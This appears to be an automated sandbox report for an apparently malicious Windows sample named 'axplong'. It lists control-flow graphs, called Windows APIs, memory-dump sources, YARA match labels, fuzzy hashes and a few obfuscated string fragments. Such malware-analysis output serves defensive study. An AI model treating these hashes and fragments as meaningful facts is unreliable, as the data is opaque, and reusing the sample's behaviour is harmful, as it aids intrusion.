                    control_flow_graph 1352 103d4d4-103d4f5 call 101de90 1355 103d4f7 1352->1355 1356 103d50f-103d512 1352->1356 1357 103d4f9-103d4ff 1355->1357 1358 103d52e-103d53a call 103a668 1355->1358 1356->1358 1359 103d514-103d517 1356->1359 1361 103d523-103d52c call 103d41c 1357->1361 1362 103d501-103d505 1357->1362 1369 103d544-103d550 call 103d45e 1358->1369 1370 103d53c-103d53f 1358->1370 1359->1361 1363 103d519-103d51c 1359->1363 1374 103d56c-103d575 1361->1374 1362->1358 1365 103d507-103d50b 1362->1365 1366 103d552-103d562 call 1037423 call 1036b6a 1363->1366 1367 103d51e-103d521 1363->1367 1365->1366 1371 103d50d 1365->1371 1366->1370 1367->1361 1367->1366 1369->1366 1384 103d564-103d569 1369->1384 1375 103d6ab-103d6ba 1370->1375 1371->1361 1380 103d582-103d593 1374->1380 1381 103d577-103d57f call 1038c6b 1374->1381 1382 103d595-103d5a7 1380->1382 1383 103d5a9 1380->1383 1381->1380 1388 103d5ab-103d5bc 1382->1388 1383->1388 1384->1374 1389 103d62a-103d63a call 103d667 1388->1389 1390 103d5be-103d5c0 1388->1390 1400 103d6a9 1389->1400 1401 103d63c-103d63e 1389->1401 1392 103d5c6-103d5c8 1390->1392 1393 103d6bb-103d6bd 1390->1393 1395 103d5d4-103d5e0 1392->1395 1396 103d5ca-103d5cd 1392->1396 1397 103d6c7-103d6da call 10364fd 1393->1397 1398 103d6bf-103d6c6 call 1038cb3 1393->1398 1403 103d5e2-103d5f7 call 103d4cb * 2 1395->1403 1404 103d620-103d628 1395->1404 1396->1395 1402 103d5cf-103d5d2 1396->1402 1418 103d6e8-103d6ee 1397->1418 1419 103d6dc-103d6e6 1397->1419 1398->1397 1400->1375 1407 103d640-103d656 call 103a511 1401->1407 1408 103d679-103d682 1401->1408 1402->1395 1409 103d5fa-103d5fc 1402->1409 1403->1409 1404->1389 1427 103d685-103d688 1407->1427 1408->1427 1409->1404 1412 103d5fe-103d60e 1409->1412 1417 103d610-103d615 1412->1417 1417->1389 1422 103d617-103d61e 1417->1422 1424 103d6f0-103d6f1 1418->1424 1425 103d707-103d718 RtlAllocateHeap 1418->1425 1419->1418 1423 103d71c-103d727 call 1037423 1419->1423 1422->1417 1435 103d729-103d72b 1423->1435 1424->1425 1428 103d6f3-103d6fa call 1039c61 1425->1428 1429 103d71a 1425->1429 1432 103d694-103d69c 1427->1432 1433 103d68a-103d68d 1427->1433 1428->1423 1441 103d6fc-103d705 call 1038cd9 1428->1441 1429->1435 1432->1400 1439 103d69e-103d6a6 call 103a511 1432->1439 1433->1432 1437 103d68f-103d692 1433->1437 1437->1400 1437->1432 1439->1400 1441->1423 1441->1425
                    Memory Dump Source
                    • Source File: 00000001.00000002.4114156950.0000000001001000.00000040.00000001.01000000.00000007.sdmp, Offset: 01000000, based on PE: true
                    • Associated: 00000001.00000002.4114137774.0000000001000000.00000004.00000001.01000000.00000007.sdmpDownload File
                    • Associated: 00000001.00000002.4114156950.0000000001062000.00000040.00000001.01000000.00000007.sdmpDownload File
                    • Associated: 00000001.00000002.4114222559.0000000001069000.00000004.00000001.01000000.00000007.sdmpDownload File
                    • Associated: 00000001.00000002.4114242252.000000000106B000.00000040.00000001.01000000.00000007.sdmpDownload File
                    • Associated: 00000001.00000002.4114242252.00000000011F7000.00000040.00000001.01000000.00000007.sdmpDownload File
                    • Associated: 00000001.00000002.4114242252.00000000012DD000.00000040.00000001.01000000.00000007.sdmpDownload File
                    • Associated: 00000001.00000002.4114242252.000000000130C000.00000040.00000001.01000000.00000007.sdmpDownload File
                    • Associated: 00000001.00000002.4114242252.0000000001315000.00000040.00000001.01000000.00000007.sdmpDownload File
                    • Associated: 00000001.00000002.4114242252.0000000001324000.00000040.00000001.01000000.00000007.sdmpDownload File
                    • Associated: 00000001.00000002.4114546321.0000000001325000.00000080.00000001.01000000.00000007.sdmpDownload File
                    • Associated: 00000001.00000002.4114662859.00000000014CC000.00000040.00000001.01000000.00000007.sdmpDownload File
                    • Associated: 00000001.00000002.4114682556.00000000014CE000.00000080.00000001.01000000.00000007.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_1_2_1000000_axplong.jbxd
                    Yara matches
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: 88c0ed3c6937f75ac97d4489276b017266130c39aac2ad2bf8d3b6a8252afa25
                    • Instruction ID: bf580ea0ef0ac4694253749dbf92319759f2e4148cc6e6400fb132cca9c81f0e
                    • Opcode Fuzzy Hash: 88c0ed3c6937f75ac97d4489276b017266130c39aac2ad2bf8d3b6a8252afa25
                    • Instruction Fuzzy Hash: C061F272D002158FEF66AFECD4846EDBBF8BBD9314F94419AD4D9AB290D7318800CB50

                    Control-flow Graph

                    • Executed
                    • Not Executed
                    control_flow_graph 1446 1008290-1008311 call 1034000 1450 1008313-1008318 1446->1450 1451 100831d-1008345 call 1017840 call 1005b00 1446->1451 1452 100845f-100847b call 101cef4 1450->1452 1459 1008347 1451->1459 1460 1008349-100836b call 1017840 call 1005b00 1451->1460 1459->1460 1465 100836d 1460->1465 1466 100836f-1008388 1460->1466 1465->1466 1469 10083b9-10083e4 1466->1469 1470 100838a-1008399 1466->1470 1473 1008411-1008432 1469->1473 1474 10083e6-10083f5 1469->1474 1471 100839b-10083a9 1470->1471 1472 10083af-10083b6 call 101d569 1470->1472 1471->1472 1475 100847c-1008481 call 1036b7a 1471->1475 1472->1469 1479 1008434-1008436 GetNativeSystemInfo 1473->1479 1480 1008438-100843d 1473->1480 1477 1008407-100840e call 101d569 1474->1477 1478 10083f7-1008405 1474->1478 1477->1473 1478->1475 1478->1477 1484 100843e-1008445 1479->1484 1480->1484 1484->1452 1485 1008447-100844f 1484->1485 1489 1008451-1008456 1485->1489 1490 1008458-100845b 1485->1490 1489->1452 1490->1452 1491 100845d 1490->1491 1491->1452
                    APIs
                    • GetNativeSystemInfo.KERNELBASE(?), ref: 01008434
                    Memory Dump Source
                    • Source File: 00000001.00000002.4114156950.0000000001001000.00000040.00000001.01000000.00000007.sdmp, Offset: 01000000, based on PE: true
                    • Associated: 00000001.00000002.4114137774.0000000001000000.00000004.00000001.01000000.00000007.sdmpDownload File
                    • Associated: 00000001.00000002.4114156950.0000000001062000.00000040.00000001.01000000.00000007.sdmpDownload File
                    • Associated: 00000001.00000002.4114222559.0000000001069000.00000004.00000001.01000000.00000007.sdmpDownload File
                    • Associated: 00000001.00000002.4114242252.000000000106B000.00000040.00000001.01000000.00000007.sdmpDownload File
                    • Associated: 00000001.00000002.4114242252.00000000011F7000.00000040.00000001.01000000.00000007.sdmpDownload File
                    • Associated: 00000001.00000002.4114242252.00000000012DD000.00000040.00000001.01000000.00000007.sdmpDownload File
                    • Associated: 00000001.00000002.4114242252.000000000130C000.00000040.00000001.01000000.00000007.sdmpDownload File
                    • Associated: 00000001.00000002.4114242252.0000000001315000.00000040.00000001.01000000.00000007.sdmpDownload File
                    • Associated: 00000001.00000002.4114242252.0000000001324000.00000040.00000001.01000000.00000007.sdmpDownload File
                    • Associated: 00000001.00000002.4114546321.0000000001325000.00000080.00000001.01000000.00000007.sdmpDownload File
                    • Associated: 00000001.00000002.4114662859.00000000014CC000.00000040.00000001.01000000.00000007.sdmpDownload File
                    • Associated: 00000001.00000002.4114682556.00000000014CE000.00000080.00000001.01000000.00000007.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_1_2_1000000_axplong.jbxd
                    Yara matches
                    Similarity
                    • API ID: InfoNativeSystem
                    • String ID:
                    • API String ID: 1721193555-0
                    • Opcode ID: b093b05ea848897f52cf857895365a3c0f3f05fe0727e1d99e324200b58bc5b7
                    • Instruction ID: c62c0257e550a965e8e9397b3b177b32742301403915e6c87a1c485da950363c
                    • Opcode Fuzzy Hash: b093b05ea848897f52cf857895365a3c0f3f05fe0727e1d99e324200b58bc5b7
                    • Instruction Fuzzy Hash: 22512870D002089BFB15EB78CD487DEBB75EB45314F5082ADE988A72D1EF359A84CB91

                    Control-flow Graph

                    • Executed
                    • Not Executed
                    control_flow_graph 1492 1036c79-1036c85 1493 1036c87-1036ca3 call 1037410 call 1037423 call 1036b6a 1492->1493 1494 1036ca4-1036cc8 call 1034000 1492->1494 1499 1036ce6-1036d08 CreateFileW 1494->1499 1500 1036cca-1036ce4 call 1037410 call 1037423 call 1036b6a 1494->1500 1503 1036d0a-1036d0e call 1036de1 1499->1503 1504 1036d18-1036d1f call 1036d57 1499->1504 1524 1036d52-1036d56 1500->1524 1512 1036d13-1036d16 1503->1512 1514 1036d20-1036d22 1504->1514 1512->1514 1516 1036d44-1036d47 1514->1516 1517 1036d24-1036d41 call 1034000 1514->1517 1520 1036d50 1516->1520 1521 1036d49-1036d4f 1516->1521 1517->1516 1520->1524 1521->1520
                    Memory Dump Source
                    • Source File: 00000001.00000002.4114156950.0000000001001000.00000040.00000001.01000000.00000007.sdmp, Offset: 01000000, based on PE: true
                    • Associated: 00000001.00000002.4114137774.0000000001000000.00000004.00000001.01000000.00000007.sdmpDownload File
                    • Associated: 00000001.00000002.4114156950.0000000001062000.00000040.00000001.01000000.00000007.sdmpDownload File
                    • Associated: 00000001.00000002.4114222559.0000000001069000.00000004.00000001.01000000.00000007.sdmpDownload File
                    • Associated: 00000001.00000002.4114242252.000000000106B000.00000040.00000001.01000000.00000007.sdmpDownload File
                    • Associated: 00000001.00000002.4114242252.00000000011F7000.00000040.00000001.01000000.00000007.sdmpDownload File
                    • Associated: 00000001.00000002.4114242252.00000000012DD000.00000040.00000001.01000000.00000007.sdmpDownload File
                    • Associated: 00000001.00000002.4114242252.000000000130C000.00000040.00000001.01000000.00000007.sdmpDownload File
                    • Associated: 00000001.00000002.4114242252.0000000001315000.00000040.00000001.01000000.00000007.sdmpDownload File
                    • Associated: 00000001.00000002.4114242252.0000000001324000.00000040.00000001.01000000.00000007.sdmpDownload File
                    • Associated: 00000001.00000002.4114546321.0000000001325000.00000080.00000001.01000000.00000007.sdmpDownload File
                    • Associated: 00000001.00000002.4114662859.00000000014CC000.00000040.00000001.01000000.00000007.sdmpDownload File
                    • Associated: 00000001.00000002.4114682556.00000000014CE000.00000080.00000001.01000000.00000007.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_1_2_1000000_axplong.jbxd
                    Yara matches
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: 391a1c081862db805256c189c508b54f32cee1940f923eaf99ef56ddc3bbb833
                    • Instruction ID: 19419e3b44ede1a9f1012a4a1632c535c76f5e9247196facf0f5915c54f1308f
                    • Opcode Fuzzy Hash: 391a1c081862db805256c189c508b54f32cee1940f923eaf99ef56ddc3bbb833
                    • Instruction Fuzzy Hash: 9D21F872D01109BAEB117B68AC44BEE3B6DDF82338F200354F9A42B1D0DB716F4586A1

                    Control-flow Graph

                    • Executed
                    • Not Executed
                    control_flow_graph 1526 1036f51-1036f67 1527 1036f77-1036f87 1526->1527 1528 1036f69-1036f6d 1526->1528 1532 1036fc7-1036fca 1527->1532 1533 1036f89-1036f9b SystemTimeToTzSpecificLocalTime 1527->1533 1528->1527 1529 1036f6f-1036f75 1528->1529 1530 1036fcc-1036fd7 call 101cef4 1529->1530 1532->1530 1533->1532 1535 1036f9d-1036fbd call 1036fd8 1533->1535 1538 1036fc2-1036fc5 1535->1538 1538->1530
                    APIs
                    • SystemTimeToTzSpecificLocalTime.KERNELBASE(00000000,?,?), ref: 01036F93
                    Memory Dump Source
                    • Source File: 00000001.00000002.4114156950.0000000001001000.00000040.00000001.01000000.00000007.sdmp, Offset: 01000000, based on PE: true
                    • Associated: 00000001.00000002.4114137774.0000000001000000.00000004.00000001.01000000.00000007.sdmpDownload File
                    • Associated: 00000001.00000002.4114156950.0000000001062000.00000040.00000001.01000000.00000007.sdmpDownload File
                    • Associated: 00000001.00000002.4114222559.0000000001069000.00000004.00000001.01000000.00000007.sdmpDownload File
                    • Associated: 00000001.00000002.4114242252.000000000106B000.00000040.00000001.01000000.00000007.sdmpDownload File
                    • Associated: 00000001.00000002.4114242252.00000000011F7000.00000040.00000001.01000000.00000007.sdmpDownload File
                    • Associated: 00000001.00000002.4114242252.00000000012DD000.00000040.00000001.01000000.00000007.sdmpDownload File
                    • Associated: 00000001.00000002.4114242252.000000000130C000.00000040.00000001.01000000.00000007.sdmpDownload File
                    • Associated: 00000001.00000002.4114242252.0000000001315000.00000040.00000001.01000000.00000007.sdmpDownload File
                    • Associated: 00000001.00000002.4114242252.0000000001324000.00000040.00000001.01000000.00000007.sdmpDownload File
                    • Associated: 00000001.00000002.4114546321.0000000001325000.00000080.00000001.01000000.00000007.sdmpDownload File
                    • Associated: 00000001.00000002.4114662859.00000000014CC000.00000040.00000001.01000000.00000007.sdmpDownload File
                    • Associated: 00000001.00000002.4114682556.00000000014CE000.00000080.00000001.01000000.00000007.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_1_2_1000000_axplong.jbxd
                    Yara matches
                    Similarity
                    • API ID: Time$LocalSpecificSystem
                    • String ID:
                    • API String ID: 2574697306-0
                    • Opcode ID: 016c259adef601f7ddcc95d925994b515daeb33cbcfe82da7819be13101c58c5
                    • Instruction ID: 7b21821ea2a19dfcd6cdd21e85232fb28383e53d53b08601973df84c132b5574
                    • Opcode Fuzzy Hash: 016c259adef601f7ddcc95d925994b515daeb33cbcfe82da7819be13101c58c5
                    • Instruction Fuzzy Hash: 49111CB290010DBFDB10DE95C944EDFB7FCAB48320F504266E551E6190EB31EB48CB61

                    Control-flow Graph

                    • Executed
                    • Not Executed
                    control_flow_graph 1539 103d6cf-103d6da 1540 103d6e8-103d6ee 1539->1540 1541 103d6dc-103d6e6 1539->1541 1543 103d6f0-103d6f1 1540->1543 1544 103d707-103d718 RtlAllocateHeap 1540->1544 1541->1540 1542 103d71c-103d727 call 1037423 1541->1542 1549 103d729-103d72b 1542->1549 1543->1544 1545 103d6f3-103d6fa call 1039c61 1544->1545 1546 103d71a 1544->1546 1545->1542 1552 103d6fc-103d705 call 1038cd9 1545->1552 1546->1549 1552->1542 1552->1544
                    APIs
                    • RtlAllocateHeap.NTDLL(00000008,?,00000000,?,00000003,0103A5CD,?,0103748E,?,00000000,?), ref: 0103D711
                    Memory Dump Source
                    • Source File: 00000001.00000002.4114156950.0000000001001000.00000040.00000001.01000000.00000007.sdmp, Offset: 01000000, based on PE: true
                    • Associated: 00000001.00000002.4114137774.0000000001000000.00000004.00000001.01000000.00000007.sdmpDownload File
                    • Associated: 00000001.00000002.4114156950.0000000001062000.00000040.00000001.01000000.00000007.sdmpDownload File
                    • Associated: 00000001.00000002.4114222559.0000000001069000.00000004.00000001.01000000.00000007.sdmpDownload File
                    • Associated: 00000001.00000002.4114242252.000000000106B000.00000040.00000001.01000000.00000007.sdmpDownload File
                    • Associated: 00000001.00000002.4114242252.00000000011F7000.00000040.00000001.01000000.00000007.sdmpDownload File
                    • Associated: 00000001.00000002.4114242252.00000000012DD000.00000040.00000001.01000000.00000007.sdmpDownload File
                    • Associated: 00000001.00000002.4114242252.000000000130C000.00000040.00000001.01000000.00000007.sdmpDownload File
                    • Associated: 00000001.00000002.4114242252.0000000001315000.00000040.00000001.01000000.00000007.sdmpDownload File
                    • Associated: 00000001.00000002.4114242252.0000000001324000.00000040.00000001.01000000.00000007.sdmpDownload File
                    • Associated: 00000001.00000002.4114546321.0000000001325000.00000080.00000001.01000000.00000007.sdmpDownload File
                    • Associated: 00000001.00000002.4114662859.00000000014CC000.00000040.00000001.01000000.00000007.sdmpDownload File
                    • Associated: 00000001.00000002.4114682556.00000000014CE000.00000080.00000001.01000000.00000007.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_1_2_1000000_axplong.jbxd
                    Yara matches
                    Similarity
                    • API ID: AllocateHeap
                    • String ID:
                    • API String ID: 1279760036-0
                    • Opcode ID: 33c51d5a1b928d3fb5f03be66c63af80a28c6ba9cc2b91a9e3746ff5d8bc8966
                    • Instruction ID: b4e7874790b859dedb75e1414371a3a9b8a4f3aa0eb27fa7bd9eeb12102774be
                    • Opcode Fuzzy Hash: 33c51d5a1b928d3fb5f03be66c63af80a28c6ba9cc2b91a9e3746ff5d8bc8966
                    • Instruction Fuzzy Hash: 15F0E23150526566AB622AEA9C01A9BBFDDFFD5270B488552FDC89A181EB30D40043E0

                    Control-flow Graph

                    APIs
                    Memory Dump Source
                    • Source File: 00000001.00000002.4114156950.0000000001001000.00000040.00000001.01000000.00000007.sdmp, Offset: 01000000, based on PE: true
                    • Associated: 00000001.00000002.4114137774.0000000001000000.00000004.00000001.01000000.00000007.sdmpDownload File
                    • Associated: 00000001.00000002.4114156950.0000000001062000.00000040.00000001.01000000.00000007.sdmpDownload File
                    • Associated: 00000001.00000002.4114222559.0000000001069000.00000004.00000001.01000000.00000007.sdmpDownload File
                    • Associated: 00000001.00000002.4114242252.000000000106B000.00000040.00000001.01000000.00000007.sdmpDownload File
                    • Associated: 00000001.00000002.4114242252.00000000011F7000.00000040.00000001.01000000.00000007.sdmpDownload File
                    • Associated: 00000001.00000002.4114242252.00000000012DD000.00000040.00000001.01000000.00000007.sdmpDownload File
                    • Associated: 00000001.00000002.4114242252.000000000130C000.00000040.00000001.01000000.00000007.sdmpDownload File
                    • Associated: 00000001.00000002.4114242252.0000000001315000.00000040.00000001.01000000.00000007.sdmpDownload File
                    • Associated: 00000001.00000002.4114242252.0000000001324000.00000040.00000001.01000000.00000007.sdmpDownload File
                    • Associated: 00000001.00000002.4114546321.0000000001325000.00000080.00000001.01000000.00000007.sdmpDownload File
                    • Associated: 00000001.00000002.4114662859.00000000014CC000.00000040.00000001.01000000.00000007.sdmpDownload File
                    • Associated: 00000001.00000002.4114682556.00000000014CE000.00000080.00000001.01000000.00000007.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_1_2_1000000_axplong.jbxd
                    Yara matches
                    Similarity
                    • API ID: Sleep
                    • String ID:
                    • API String ID: 3472027048-0
                    • Opcode ID: 0a40faeb843f6deaf25a7f866e528054822f6dc8ad756a5577857f365c66a76e
                    • Instruction ID: 920a9dbd48977c76753711302a7440203c0ab3abf5ddc76149627fd5d090783a
                    • Opcode Fuzzy Hash: 0a40faeb843f6deaf25a7f866e528054822f6dc8ad756a5577857f365c66a76e
                    • Instruction Fuzzy Hash: 41F02871E40605EBC710BB69CD0674FBB78EB12A60F80039CE8916B3D9DB7929008BD3
                    Memory Dump Source
                    • Source File: 00000001.00000002.4117219081.0000000005740000.00000040.00001000.00020000.00000000.sdmp, Offset: 05740000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_1_2_5740000_axplong.jbxd
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: 7499450f3e7be96d82bd794de61cbaf40951ccac8e51541a75ad80feb08de835
                    • Instruction ID: 70cb27e7c9f4070e596880b6e055c49af0e3c3c77580deb0b4b2bfbbebc31ee6
                    • Opcode Fuzzy Hash: 7499450f3e7be96d82bd794de61cbaf40951ccac8e51541a75ad80feb08de835
                    • Instruction Fuzzy Hash: 21C08CA7248028D91080908AB80DDFA638DE4922B33500133F302C94808605080ABA71
                    Strings
                    Memory Dump Source
                    • Source File: 00000001.00000002.4114156950.0000000001001000.00000040.00000001.01000000.00000007.sdmp, Offset: 01000000, based on PE: true
                    • Associated: 00000001.00000002.4114137774.0000000001000000.00000004.00000001.01000000.00000007.sdmpDownload File
                    • Associated: 00000001.00000002.4114156950.0000000001062000.00000040.00000001.01000000.00000007.sdmpDownload File
                    • Associated: 00000001.00000002.4114222559.0000000001069000.00000004.00000001.01000000.00000007.sdmpDownload File
                    • Associated: 00000001.00000002.4114242252.000000000106B000.00000040.00000001.01000000.00000007.sdmpDownload File
                    • Associated: 00000001.00000002.4114242252.00000000011F7000.00000040.00000001.01000000.00000007.sdmpDownload File
                    • Associated: 00000001.00000002.4114242252.00000000012DD000.00000040.00000001.01000000.00000007.sdmpDownload File
                    • Associated: 00000001.00000002.4114242252.000000000130C000.00000040.00000001.01000000.00000007.sdmpDownload File
                    • Associated: 00000001.00000002.4114242252.0000000001315000.00000040.00000001.01000000.00000007.sdmpDownload File
                    • Associated: 00000001.00000002.4114242252.0000000001324000.00000040.00000001.01000000.00000007.sdmpDownload File
                    • Associated: 00000001.00000002.4114546321.0000000001325000.00000080.00000001.01000000.00000007.sdmpDownload File
                    • Associated: 00000001.00000002.4114662859.00000000014CC000.00000040.00000001.01000000.00000007.sdmpDownload File
                    • Associated: 00000001.00000002.4114682556.00000000014CE000.00000080.00000001.01000000.00000007.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_1_2_1000000_axplong.jbxd
                    Yara matches
                    Similarity
                    • API ID:
                    • String ID: 111$246122658369$HcKn91KZ$NF==$NvB+$Vp==$XIp=$XIt=$Xst=$e76b71
                    • API String ID: 0-788600999
                    • Opcode ID: dc0556e0ff5400344326f583ad7d704a590e9f29a113065d4bf7c5221aa3701d
                    • Instruction ID: 2b910c92b87479256b765a02ff5f50e6fe61ab28a7ff5fa99e9fab6dcae296bc
                    • Opcode Fuzzy Hash: dc0556e0ff5400344326f583ad7d704a590e9f29a113065d4bf7c5221aa3701d
                    • Instruction Fuzzy Hash: 76820670900249DBEF15EF68C9497CE7FB6AF55304F508188E8856B3C5C7B99A84CBD2
                    APIs
                    Strings
                    Memory Dump Source
                    • Source File: 00000001.00000002.4114156950.0000000001001000.00000040.00000001.01000000.00000007.sdmp, Offset: 01000000, based on PE: true
                    • Associated: 00000001.00000002.4114137774.0000000001000000.00000004.00000001.01000000.00000007.sdmpDownload File
                    • Associated: 00000001.00000002.4114156950.0000000001062000.00000040.00000001.01000000.00000007.sdmpDownload File
                    • Associated: 00000001.00000002.4114222559.0000000001069000.00000004.00000001.01000000.00000007.sdmpDownload File
                    • Associated: 00000001.00000002.4114242252.000000000106B000.00000040.00000001.01000000.00000007.sdmpDownload File
                    • Associated: 00000001.00000002.4114242252.00000000011F7000.00000040.00000001.01000000.00000007.sdmpDownload File
                    • Associated: 00000001.00000002.4114242252.00000000012DD000.00000040.00000001.01000000.00000007.sdmpDownload File
                    • Associated: 00000001.00000002.4114242252.000000000130C000.00000040.00000001.01000000.00000007.sdmpDownload File
                    • Associated: 00000001.00000002.4114242252.0000000001315000.00000040.00000001.01000000.00000007.sdmpDownload File
                    • Associated: 00000001.00000002.4114242252.0000000001324000.00000040.00000001.01000000.00000007.sdmpDownload File
                    • Associated: 00000001.00000002.4114546321.0000000001325000.00000080.00000001.01000000.00000007.sdmpDownload File
                    • Associated: 00000001.00000002.4114662859.00000000014CC000.00000040.00000001.01000000.00000007.sdmpDownload File
                    • Associated: 00000001.00000002.4114682556.00000000014CE000.00000080.00000001.01000000.00000007.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_1_2_1000000_axplong.jbxd
                    Yara matches
                    Similarity
                    • API ID: __floor_pentium4
                    • String ID: 1#IND$1#INF$1#QNAN$1#SNAN
                    • API String ID: 4168288129-2761157908
                    • Opcode ID: 9301fa2cb9bfbb76db22b6f551bd5cacb1bebb1de286640dabc079fefe5abd10
                    • Instruction ID: 092fa4816ee8e09912be056b58b4532c5a7f18d293987f12fd1f278a4f1b0157
                    • Opcode Fuzzy Hash: 9301fa2cb9bfbb76db22b6f551bd5cacb1bebb1de286640dabc079fefe5abd10
                    • Instruction Fuzzy Hash: 3BC23AB1E046298FDB65CE288D807EAB7F5FB84305F1451EAD98DE7240E775AE818F40
                    Memory Dump Source
                    • Source File: 00000001.00000002.4114156950.0000000001001000.00000040.00000001.01000000.00000007.sdmp, Offset: 01000000, based on PE: true
                    • Associated: 00000001.00000002.4114137774.0000000001000000.00000004.00000001.01000000.00000007.sdmpDownload File
                    • Associated: 00000001.00000002.4114156950.0000000001062000.00000040.00000001.01000000.00000007.sdmpDownload File
                    • Associated: 00000001.00000002.4114222559.0000000001069000.00000004.00000001.01000000.00000007.sdmpDownload File
                    • Associated: 00000001.00000002.4114242252.000000000106B000.00000040.00000001.01000000.00000007.sdmpDownload File
                    • Associated: 00000001.00000002.4114242252.00000000011F7000.00000040.00000001.01000000.00000007.sdmpDownload File
                    • Associated: 00000001.00000002.4114242252.00000000012DD000.00000040.00000001.01000000.00000007.sdmpDownload File
                    • Associated: 00000001.00000002.4114242252.000000000130C000.00000040.00000001.01000000.00000007.sdmpDownload File
                    • Associated: 00000001.00000002.4114242252.0000000001315000.00000040.00000001.01000000.00000007.sdmpDownload File
                    • Associated: 00000001.00000002.4114242252.0000000001324000.00000040.00000001.01000000.00000007.sdmpDownload File
                    • Associated: 00000001.00000002.4114546321.0000000001325000.00000080.00000001.01000000.00000007.sdmpDownload File
                    • Associated: 00000001.00000002.4114662859.00000000014CC000.00000040.00000001.01000000.00000007.sdmpDownload File
                    • Associated: 00000001.00000002.4114682556.00000000014CE000.00000080.00000001.01000000.00000007.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_1_2_1000000_axplong.jbxd
                    Yara matches
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: 5bf072589c0c8c6daaa14a71d751704f1d0fc013c2abe94fbb674223392015af
                    • Instruction ID: 8ccd9caae4f10535fd10eec54149edadbd12d326495cfa54b9fd9f7d4a81ef4f
                    • Opcode Fuzzy Hash: 5bf072589c0c8c6daaa14a71d751704f1d0fc013c2abe94fbb674223392015af
                    • Instruction Fuzzy Hash: 08F16EB1E002199FDF14CFA9D8C06ADBBF1FF88314F1582A9E959AB345D731A901CB90
                    APIs
                    • GetSystemTimePreciseAsFileTime.KERNEL32(?,0101CE55,?,?,?,?,0101CE8A,?,?,?,?,?,?,0101C400,?,00000001), ref: 0101CB06
                    Memory Dump Source
                    • Source File: 00000001.00000002.4114156950.0000000001001000.00000040.00000001.01000000.00000007.sdmp, Offset: 01000000, based on PE: true
                    • Associated: 00000001.00000002.4114137774.0000000001000000.00000004.00000001.01000000.00000007.sdmpDownload File
                    • Associated: 00000001.00000002.4114156950.0000000001062000.00000040.00000001.01000000.00000007.sdmpDownload File
                    • Associated: 00000001.00000002.4114222559.0000000001069000.00000004.00000001.01000000.00000007.sdmpDownload File
                    • Associated: 00000001.00000002.4114242252.000000000106B000.00000040.00000001.01000000.00000007.sdmpDownload File
                    • Associated: 00000001.00000002.4114242252.00000000011F7000.00000040.00000001.01000000.00000007.sdmpDownload File
                    • Associated: 00000001.00000002.4114242252.00000000012DD000.00000040.00000001.01000000.00000007.sdmpDownload File
                    • Associated: 00000001.00000002.4114242252.000000000130C000.00000040.00000001.01000000.00000007.sdmpDownload File
                    • Associated: 00000001.00000002.4114242252.0000000001315000.00000040.00000001.01000000.00000007.sdmpDownload File
                    • Associated: 00000001.00000002.4114242252.0000000001324000.00000040.00000001.01000000.00000007.sdmpDownload File
                    • Associated: 00000001.00000002.4114546321.0000000001325000.00000080.00000001.01000000.00000007.sdmpDownload File
                    • Associated: 00000001.00000002.4114662859.00000000014CC000.00000040.00000001.01000000.00000007.sdmpDownload File
                    • Associated: 00000001.00000002.4114682556.00000000014CE000.00000080.00000001.01000000.00000007.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_1_2_1000000_axplong.jbxd
                    Yara matches
                    Similarity
                    • API ID: Time$FilePreciseSystem
                    • String ID:
                    • API String ID: 1802150274-0
                    • Opcode ID: 4fd419810dc21ec08aacc91051ae74998939844f8bafb1a7b46236a8fefe4c69
                    • Instruction ID: cfc0db8f13e7184c709c2f0697ccd227c974bef64f200a15db663e88f8425007
                    • Opcode Fuzzy Hash: 4fd419810dc21ec08aacc91051ae74998939844f8bafb1a7b46236a8fefe4c69
                    • Instruction Fuzzy Hash: 70D02232B8313863DB212A84BC144AEBB58FF04BA07044021FA4AA3218CA1A9C00DBE4
                    Strings
                    Memory Dump Source
                    • Source File: 00000001.00000002.4114156950.0000000001001000.00000040.00000001.01000000.00000007.sdmp, Offset: 01000000, based on PE: true
                    • Associated: 00000001.00000002.4114137774.0000000001000000.00000004.00000001.01000000.00000007.sdmpDownload File
                    • Associated: 00000001.00000002.4114156950.0000000001062000.00000040.00000001.01000000.00000007.sdmpDownload File
                    • Associated: 00000001.00000002.4114222559.0000000001069000.00000004.00000001.01000000.00000007.sdmpDownload File
                    • Associated: 00000001.00000002.4114242252.000000000106B000.00000040.00000001.01000000.00000007.sdmpDownload File
                    • Associated: 00000001.00000002.4114242252.00000000011F7000.00000040.00000001.01000000.00000007.sdmpDownload File
                    • Associated: 00000001.00000002.4114242252.00000000012DD000.00000040.00000001.01000000.00000007.sdmpDownload File
                    • Associated: 00000001.00000002.4114242252.000000000130C000.00000040.00000001.01000000.00000007.sdmpDownload File
                    • Associated: 00000001.00000002.4114242252.0000000001315000.00000040.00000001.01000000.00000007.sdmpDownload File
                    • Associated: 00000001.00000002.4114242252.0000000001324000.00000040.00000001.01000000.00000007.sdmpDownload File
                    • Associated: 00000001.00000002.4114546321.0000000001325000.00000080.00000001.01000000.00000007.sdmpDownload File
                    • Associated: 00000001.00000002.4114662859.00000000014CC000.00000040.00000001.01000000.00000007.sdmpDownload File
                    • Associated: 00000001.00000002.4114682556.00000000014CE000.00000080.00000001.01000000.00000007.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_1_2_1000000_axplong.jbxd
                    Yara matches
                    Similarity
                    • API ID:
                    • String ID: 0
                    • API String ID: 0-4108050209
